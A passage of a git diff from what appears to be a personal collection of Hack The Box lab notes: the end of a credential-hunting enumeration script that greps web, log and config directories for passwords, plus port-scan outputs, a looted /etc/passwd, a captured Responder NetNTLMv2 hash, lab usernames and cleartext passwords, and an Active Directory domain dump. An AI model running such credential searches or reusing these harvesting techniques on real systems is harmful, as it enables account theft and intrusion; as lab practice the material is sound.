+ timeout 120 find /var/www -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Usernames (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+echo ''
+
+else
+ echo "Regexes to search for API keys aren't activated, use param '-r' "
+fi
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
diff --git a/faculty/nmap b/faculty/nmap
new file mode 100644
index 0000000..1a93b3e
--- /dev/null
+++ b/faculty/nmap
@@ -0,0 +1,22 @@
+# Nmap 7.80 scan initiated Sun Aug 21 09:18:04 2022 as: nmap -vvv -p 22,80 -sC -sV -Pn -oN nmap 10.10.11.169
+Nmap scan report for faculty.htb (10.10.11.169)
+Host is up, received user-set (0.26s latency).
+Scanned at 2022-08-21 09:18:04 IST for 16s
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
+| http-cookie-flags:
+| /:
+| PHPSESSID:
+|_ httponly flag not set
+| http-methods:
+|_ Supported Methods: GET HEAD POST
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+| http-title: School Faculty Scheduling System
+|_Requested resource was login.php
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sun Aug 21 09:18:20 2022 -- 1 IP address (1 host up) scanned in 16.71 seconds
diff --git a/faculty/passwd b/faculty/passwd
new file mode 100644
index 0000000..efbde3f
--- /dev/null
+++ b/faculty/passwd
@@ -0,0 +1,37 @@
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+pollinate:x:110:1::/var/cache/pollinate:/bin/false
+sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
+gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
+postfix:x:113:119::/var/spool/postfix:/usr/sbin/nologin
+developer:x:1001:1002:,,,:/home/developer:/bin/bash
+usbmux:x:114:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
diff --git a/redeemer/rustscan b/redeemer/rustscan
new file mode 100644
index 0000000..ffa5dd0
--- /dev/null
+++ b/redeemer/rustscan
@@ -0,0 +1,73 @@
+.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
+| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
+| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
+`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy           :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Nmap? More like slowmap.🐢
+
+[~] The config file is expected to be at "/home/compromyse/.rustscan.toml"
+[~] Automatically increasing ulimit value to 5000.
+Open 10.129.152.204:6379
+[~] Starting Script(s)
+[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
+
+[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-17 21:13 IST
+NSE: Loaded 151 scripts for scanning.
+NSE: Script Pre-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+Initiating Ping Scan at 21:13
+Scanning 10.129.152.204 [2 ports]
+Completed Ping Scan at 21:13, 0.30s elapsed (1 total hosts)
+Initiating Parallel DNS resolution of 1 host. at 21:13
+Completed Parallel DNS resolution of 1 host. at 21:13, 0.02s elapsed
+DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+Initiating Connect Scan at 21:13
+Scanning 10.129.152.204 [1 port]
+Discovered open port 6379/tcp on 10.129.152.204
+Completed Connect Scan at 21:13, 0.28s elapsed (1 total ports)
+Initiating Service scan at 21:13
+Scanning 1 service on 10.129.152.204
+Completed Service scan at 21:13, 6.61s elapsed (1 service on 1 host)
+NSE: Script scanning 10.129.152.204.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.01s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+Nmap scan report for 10.129.152.204
+Host is up, received conn-refused (0.30s latency).
+Scanned at 2022-08-17 21:13:30 IST for 8s
+
+PORT STATE SERVICE REASON VERSION
+6379/tcp open redis syn-ack Redis key-value store 5.0.7
+
+NSE: Script Post-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 21:13
+Completed NSE at 21:13, 0.00s elapsed
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
+
diff --git a/responder/hash.txt b/responder/hash.txt
new file mode 100644
index 0000000..b311b4c
--- /dev/null
+++ b/responder/hash.txt
@@ -0,0 +1 @@
+Administrator::RESPONDER:eac0d814c4871f50:6B4B33FF81FD4B480A5F7878D2A30C15:01010000000000008055BAB483B2D80146C5B8BDF13E59600000000002000800420048004100560001001E00570049004E002D005000560057005800320048005000510056004500380004003400570049004E002D00500056005700580032004800500051005600450038002E0042004800410056002E004C004F00430041004C000300140042004800410056002E004C004F00430041004C000500140042004800410056002E004C004F00430041004C00070008008055BAB483B2D8010600040002000000080030003000000000000000010000000020000026A0AC0C024BF24EB5A4AE1DBDBD79841080514769BBABB1D8B9F207393E0FAA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310038000000000000000000
diff --git a/responder/rustscan b/responder/rustscan
new file mode 100644
index 0000000..63ce5fc
--- /dev/null
+++ b/responder/rustscan
@@ -0,0 +1,80 @@
+.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
+| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
+| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
+`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy           :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+😵 https://admin.tryhackme.com
+
+[~] The config file is expected to be at "/home/compromyse/.rustscan.toml"
+[~] Automatically increasing ulimit value to 5000.
+Open 10.129.50.64:80
+Open 10.129.50.64:5985
+[~] Starting Script(s)
+[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
+
+[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-17 22:01 IST
+NSE: Loaded 151 scripts for scanning.
+NSE: Script Pre-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:01
+Completed NSE at 22:01, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:01
+Completed NSE at 22:01, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:01
+Completed NSE at 22:01, 0.00s elapsed
+Initiating Ping Scan at 22:01
+Scanning 10.129.50.64 [2 ports]
+Completed Ping Scan at 22:01, 0.49s elapsed (1 total hosts)
+Initiating Connect Scan at 22:01
+Scanning unika.htb (10.129.50.64) [2 ports]
+Discovered open port 80/tcp on 10.129.50.64
+Discovered open port 5985/tcp on 10.129.50.64
+Completed Connect Scan at 22:01, 0.51s elapsed (2 total ports)
+Initiating Service scan at 22:01
+Scanning 2 services on unika.htb (10.129.50.64)
+Completed Service scan at 22:02, 6.62s elapsed (2 services on 1 host)
+NSE: Script scanning 10.129.50.64.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 29.38s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 2.14s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+Nmap scan report for unika.htb (10.129.50.64)
+Host is up, received syn-ack (0.50s latency).
+Scanned at 2022-08-17 22:01:55 IST for 39s
+
+PORT STATE SERVICE REASON VERSION
+80/tcp open http syn-ack Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
+| http-methods:
+|_ Supported Methods: GET HEAD POST
+|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
+|_http-title: Unika
+5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+NSE: Script Post-scanning.
+NSE: Starting runlevel 1 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+NSE: Starting runlevel 2 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+NSE: Starting runlevel 3 (of 3) scan.
+Initiating NSE at 22:02
+Completed NSE at 22:02, 0.00s elapsed
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 39.43 seconds
+
diff --git a/support/20220819205517_final.zip b/support/20220819205517_final.zip
new file mode 100644
index 0000000..a07765e
--- /dev/null
+++ b/support/20220819205517_final.zip
Binary files differ
diff --git a/support/README.md b/support/README.md
new file mode 100644
index 0000000..af846be
--- /dev/null
+++ b/support/README.md
@@ -0,0 +1,37 @@
+> IP `10.10.11.174`
+
+> usernames
+```
+support
+guest
+administrator
+```
+
+> password
+```
+nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
+```
+
+> names
+```
+raven.clifton
+anderson.damian
+monroe.david
+cromwell.gerard
+west.laura
+levine.leopoldo
+langley.lucy
+daughtler.mabel
+bardot.mary
+stoll.rachelle
+thomas.raphael
+smith.rosario
+wilson.shelby
+hernandez.stanley
+ford.victoria
+```
+
+> creds
+```
+support:Ironside47pleasure40Watchful
+``` \ No newline at end of file
diff --git a/support/UserInfo.exe.zip b/support/UserInfo.exe.zip
new file mode 100644
index 0000000..b2c1a55
--- /dev/null
+++ b/support/UserInfo.exe.zip
Binary files differ
diff --git a/support/administrator.ccache b/support/administrator.ccache
new file mode 100644
index 0000000..9f2a47a
--- /dev/null
+++ b/support/administrator.ccache
Binary files differ
diff --git a/support/domaindump/domain_computers.grep b/support/domaindump/domain_computers.grep
new file mode 100644
index 0000000..6453192
--- /dev/null
+++ b/support/domaindump/domain_computers.grep
@@ -0,0 +1,5 @@
+cn sAMAccountName dNSHostName operatingSystem operatingSystemServicePack operatingSystemVersion lastLogon userAccountControl whenCreated objectSid description
+meggiepc meggiepc$ meggiepc.support.htb 01/01/01 00:00:00 WORKSTATION_ACCOUNT 08/19/22 15:08:48 S-1-5-21-1677581083-3380853377-188903654-5102
+KRBRELAYUP KRBRELAYUP$ KRBRELAYUP.support.htb 01/01/01 00:00:00 WORKSTATION_ACCOUNT 08/19/22 15:01:17 S-1-5-21-1677581083-3380853377-188903654-5101
+MANAGEMENT MANAGEMENT$ Management.support.htb Windows 10 Pro 10.0 (19042) 07/26/22 16:01:56 WORKSTATION_ACCOUNT 07/21/22 13:19:20 S-1-5-21-1677581083-3380853377-188903654-2601
+DC DC$ dc.support.htb Windows Server 2022 Standard 10.0 (20348) 08/19/22 12:31:59 SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION 05/28/22 11:03:43 S-1-5-21-1677581083-3380853377-188903654-1000 \ No newline at end of file
diff --git a/support/domaindump/domain_computers.html b/support/domaindump/domain_computers.html
new file mode 100644
index 0000000..d16f4c8
--- /dev/null
+++ b/support/domaindump/domain_computers.html
@@ -0,0 +1,37 @@
+<!DOCTYPE html>
+<html>
+<head><meta charset="UTF-8"><style type="text/css">tbody th {
+ border: 1px solid #000;
+}
+tbody td {
+ border: 1px solid #ababab;
+ border-spacing: 0px;
+ padding: 4px;
+ border-collapse: collapse;
+}
+body {
+ font-family: verdana;
+}
+table {
+ font-size: 13px;
+ border-collapse: collapse;
+ width: 100%;
+}
+tbody tr:nth-child(odd) td {
+ background-color: #eee;
+}
+tbody tr:hover td {
+ background-color: lightblue;
+}
+thead td {
+ font-size: 19px;
+ font-weight: bold;
+ padding: 10px 0px;
+}
+</style></head><body><table><thead><tr><td colspan="11" id="cn_Domain_computer_accounts">Domain computer accounts</td></tr></thead><tbody><tr><th>CN</th><th>SAM Name</th><th>DNS Hostname</th><th>Operating System</th><th>Service Pack</th><th>OS Version</th><th>lastLogon</th><th>Flags</th><th>Created on</th><th>SID</th><th>description</th></tr>
+<tr><td>meggiepc</td><td>meggiepc$</td><td>meggiepc.support.htb</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>01/01/01 00:00:00</td><td>WORKSTATION_ACCOUNT</td><td>08/19/22 15:08:48</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-5102">5102</abbr></td><td>&nbsp;</td></tr>
+<tr><td>KRBRELAYUP</td><td>KRBRELAYUP$</td><td>KRBRELAYUP.support.htb</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>01/01/01 00:00:00</td><td>WORKSTATION_ACCOUNT</td><td>08/19/22 15:01:17</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-5101">5101</abbr></td><td>&nbsp;</td></tr>
+<tr><td>MANAGEMENT</td><td>MANAGEMENT$</td><td>Management.support.htb</td><td>Windows 10 Pro</td><td>&nbsp;</td><td>10.0 (19042)</td><td>07/26/22 16:01:56</td><td>WORKSTATION_ACCOUNT</td><td>07/21/22 13:19:20</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-2601">2601</abbr></td><td>&nbsp;</td></tr>
+<tr><td>DC</td><td>DC$</td><td>dc.support.htb</td><td>Windows Server 2022 Standard</td><td>&nbsp;</td><td>10.0 (20348)</td><td>08/19/22 12:31:59</td><td>SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION</td><td>05/28/22 11:03:43</td><td><abbr title="S-1-5-21-1677581083-3380853377-188903654-1000">1000</abbr></td><td>&nbsp;</td></tr>
+</tbody>
+</table></body></html> \ No newline at end of file
diff --git a/support/domaindump/domain_computers.json b/support/domaindump/domain_computers.json
new file mode 100644
index 0000000..57598a4
--- /dev/null
+++ b/support/domaindump/domain_computers.json
@@ -0,0 +1,476 @@
+[{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "meggiepc"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dNSHostName": [
+ "meggiepc.support.htb"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=meggiepc,CN=Computers,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ false
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "localPolicyFlags": [
+ 0
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mS-DS-CreatorSID": [
+ {
+ "encoded": "AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==",
+ "encoding": "base64"
+ }
+ ],
+ "name": [
+ "meggiepc"
+ ],
+ "objectCategory": [
+ "CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user",
+ "computer"
+ ],
+ "objectGUID": [
+ "{939079ee-3ab8-43b5-8c19-56eec37a4dcf}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-5102"
+ ],
+ "primaryGroupID": [
+ 515
+ ],
+ "pwdLastSet": [
+ "2022-08-19 15:08:48.653740+00:00"
+ ],
+ "sAMAccountName": [
+ "meggiepc$"
+ ],
+ "sAMAccountType": [
+ 805306369
+ ],
+ "servicePrincipalName": [
+ "RestrictedKrbHost/meggiepc",
+ "HOST/meggiepc",
+ "RestrictedKrbHost/meggiepc.support.htb",
+ "HOST/meggiepc.support.htb"
+ ],
+ "uSNChanged": [
+ 126820
+ ],
+ "uSNCreated": [
+ 126818
+ ],
+ "userAccountControl": [
+ 4096
+ ],
+ "whenChanged": [
+ "2022-08-19 15:08:48+00:00"
+ ],
+ "whenCreated": [
+ "2022-08-19 15:08:48+00:00"
+ ]
+ },
+ "dn": "CN=meggiepc,CN=Computers,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "KRBRELAYUP"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dNSHostName": [
+ "KRBRELAYUP.support.htb"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=KRBRELAYUP,CN=Computers,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ false
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "localPolicyFlags": [
+ 0
+ ],
+ "logonCount": [
+ 0
+ ],
+ "mS-DS-CreatorSID": [
+ {
+ "encoded": "AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==",
+ "encoding": "base64"
+ }
+ ],
+ "name": [
+ "KRBRELAYUP"
+ ],
+ "objectCategory": [
+ "CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user",
+ "computer"
+ ],
+ "objectGUID": [
+ "{16b16c4e-ed6e-47d8-a72b-3496eb94f089}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-5101"
+ ],
+ "primaryGroupID": [
+ 515
+ ],
+ "pwdLastSet": [
+ "2022-08-19 15:01:17.666101+00:00"
+ ],
+ "sAMAccountName": [
+ "KRBRELAYUP$"
+ ],
+ "sAMAccountType": [
+ 805306369
+ ],
+ "servicePrincipalName": [
+ "RestrictedKrbHost/KRBRELAYUP",
+ "HOST/KRBRELAYUP",
+ "RestrictedKrbHost/KRBRELAYUP.support.htb",
+ "HOST/KRBRELAYUP.support.htb"
+ ],
+ "uSNChanged": [
+ 126816
+ ],
+ "uSNCreated": [
+ 126814
+ ],
+ "userAccountControl": [
+ 4096
+ ],
+ "whenChanged": [
+ "2022-08-19 15:01:17+00:00"
+ ],
+ "whenCreated": [
+ "2022-08-19 15:01:17+00:00"
+ ]
+ },
+ "dn": "CN=KRBRELAYUP,CN=Computers,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "MANAGEMENT"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dNSHostName": [
+ "Management.support.htb"
+ ],
+ "dSCorePropagationData": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "distinguishedName": [
+ "CN=MANAGEMENT,CN=Computers,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ false
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "2022-07-26 16:01:56.822771+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-07-21 13:19:20.885540+00:00"
+ ],
+ "localPolicyFlags": [
+ 0
+ ],
+ "logonCount": [
+ 7
+ ],
+ "msDS-SupportedEncryptionTypes": [
+ 28
+ ],
+ "name": [
+ "MANAGEMENT"
+ ],
+ "objectCategory": [
+ "CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user",
+ "computer"
+ ],
+ "objectGUID": [
+ "{af1e117b-0fd5-45ca-be5b-1de4d1927698}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-2601"
+ ],
+ "operatingSystem": [
+ "Windows 10 Pro"
+ ],
+ "operatingSystemVersion": [
+ "10.0 (19042)"
+ ],
+ "primaryGroupID": [
+ 515
+ ],
+ "pwdLastSet": [
+ "2022-07-21 13:19:20.276114+00:00"
+ ],
+ "sAMAccountName": [
+ "MANAGEMENT$"
+ ],
+ "sAMAccountType": [
+ 805306369
+ ],
+ "servicePrincipalName": [
+ "WSMAN/Management",
+ "WSMAN/Management.support.htb",
+ "RestrictedKrbHost/MANAGEMENT",
+ "HOST/MANAGEMENT",
+ "RestrictedKrbHost/Management.support.htb",
+ "HOST/Management.support.htb"
+ ],
+ "uSNChanged": [
+ 53317
+ ],
+ "uSNCreated": [
+ 53285
+ ],
+ "userAccountControl": [
+ 4096
+ ],
+ "whenChanged": [
+ "2022-07-21 13:23:41+00:00"
+ ],
+ "whenCreated": [
+ "2022-07-21 13:19:20+00:00"
+ ]
+ },
+ "dn": "CN=MANAGEMENT,CN=Computers,DC=support,DC=htb"
+},{
+ "attributes": {
+ "accountExpires": [
+ "9999-12-31 23:59:59.999999+00:00"
+ ],
+ "badPasswordTime": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "badPwdCount": [
+ 0
+ ],
+ "cn": [
+ "DC"
+ ],
+ "codePage": [
+ 0
+ ],
+ "countryCode": [
+ 0
+ ],
+ "dNSHostName": [
+ "dc.support.htb"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:18:13+00:00",
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "distinguishedName": [
+ "CN=DC,OU=Domain Controllers,DC=support,DC=htb"
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "lastLogoff": [
+ "1601-01-01 00:00:00+00:00"
+ ],
+ "lastLogon": [
+ "2022-08-19 12:31:59.319401+00:00"
+ ],
+ "lastLogonTimestamp": [
+ "2022-08-19 04:32:27.408415+00:00"
+ ],
+ "localPolicyFlags": [
+ 0
+ ],
+ "logonCount": [
+ 55
+ ],
+ "msDFSR-ComputerReferenceBL": [
+ "CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=support,DC=htb"
+ ],
+ "msDS-GenerationId": [
+ {
+ "encoded": "qpbPWFA8P4Y=",
+ "encoding": "base64"
+ }
+ ],
+ "msDS-SupportedEncryptionTypes": [
+ 28
+ ],
+ "name": [
+ "DC"
+ ],
+ "objectCategory": [
+ "CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "person",
+ "organizationalPerson",
+ "user",
+ "computer"
+ ],
+ "objectGUID": [
+ "{afa13f1c-0399-4f7e-863f-e9c3b94c4127}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-1000"
+ ],
+ "operatingSystem": [
